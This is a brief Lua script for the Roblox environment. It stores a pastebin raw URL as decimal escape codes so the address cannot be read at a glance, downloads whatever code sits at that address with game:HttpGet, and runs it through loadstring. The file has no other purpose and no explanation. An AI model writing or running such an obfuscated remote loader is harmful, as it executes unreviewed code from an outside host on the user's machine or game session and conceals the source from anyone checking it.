local _0x4c = "\104\116\116\112\115\58\47\47\112\97\115\116\101\98\105\110\46\99\111\109\47\114\97\119\47\54\56\71\75\90\105\54\68" local function _init_process(_target) local _success, _result = pcall(function() return game:HttpGet(_target) end) if _success then local _exec, _err = loadstring(_result) if _exec then _exec() else warn("Execution Error: " .. tostring(_err)) end else warn("Connection Error: " .. tostring(_result)) end end _init_process(_0x4c)